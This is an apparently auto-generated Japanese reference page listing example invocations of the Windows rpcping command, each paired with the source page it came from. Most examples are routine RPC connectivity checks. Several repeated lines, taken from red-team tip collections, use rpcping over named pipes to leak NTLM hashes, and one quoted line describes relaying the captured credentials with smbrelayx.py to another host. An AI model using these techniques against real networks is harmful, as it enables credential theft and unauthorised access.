コマンドオプションサンプル:rpcping -S


rpcping -s *.*.*.* -t ncacn_np to leak hash
    github.com-vysec-RedTips_-_2017-06-23_10-45-47 : vysec : Free Download, Borrow, and Streaming : Internet Archive : http://archive.org/details/github.com-vysec-RedTips_-_2017-06-23_10-45-47
rpcping -s hostname to check rpc availability
    Q and A - TechNet Reset the krbtgt account password/keys : http://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51/view/Discussions/2
rpcping -s *.*.*.* -t ncacn_np to leak hash
    GitHub - vysec/RedTips: Red Team Tips as posted by @vysecurity on Twitter : http://github.com/vysec/RedTips
rpcping -s *.*.*.* -t ncacn_np to leak hash
    vysec/RedTips - Libraries.io : http://libraries.io/github/vysec/RedTips
rpcping -s *.*.*.* -t ncacn_np to leak hash
    @vysecurity Twitter Red Team Tips - Pastebin.com : http://pastebin.com/1r2xy5c1
rpcping -s internal
    windows server 2003 - Troubleshooting DTCPing Errors - Server Fault : http://serverfault.com/questions/242543/troubleshooting-dtcping-errors
rpcping -s %%a
    batch file - Test if process is running on remote units and output to log - Stack Overflow : http://stackoverflow.com/questions/49916416/test-if-process-is-running-on-remote-units-and-output-to-log
rpcping -s HOSTNAME -u 9 -a connect -I "USERNAME
    Troubleshooting remote installation on MS Windows – P9 | Support : http://support.panorama9.com/hc/en-us/articles/203568838-Troubleshooting-remote-installation-on-MS-Windows
rpcping -s *.*.*.* -t ncacn_np to leak hash
    Red Teaming Tips by Vincent Yiu – Tilting at windmills : http://threatintel.eu/2017/06/03/red-teaming-tips-by-vincent-yiu/
rpcping -s -t ncacn_np -u 10 -a connect' sends creds to smbrelayx.py successfuly. I just relayed to another host
    Omar Espino - @omespino on twimap : http://twimap.net/twitter/Akky2892
rpcping -s *.*.*.* -e 1234 -a privacy -u NTLM"
    Alex Davies(@pwndizzle)さん | Twitter : http://twitter.com/ceprevost
RpcPing -s myserver
    RpcPing and workstations? : http://www.tech-archive.net/Archive/Development/microsoft.public.win32.programmer.wmi/2009-11/msg00006.html
RPCping -s [servername]
    Event ID 2270 is received with HRESULT 0X800706BA when attempting to retrieve an archived item : http://www.veritas.com/support/en_US/article.000010800

rpcping のオプション一覧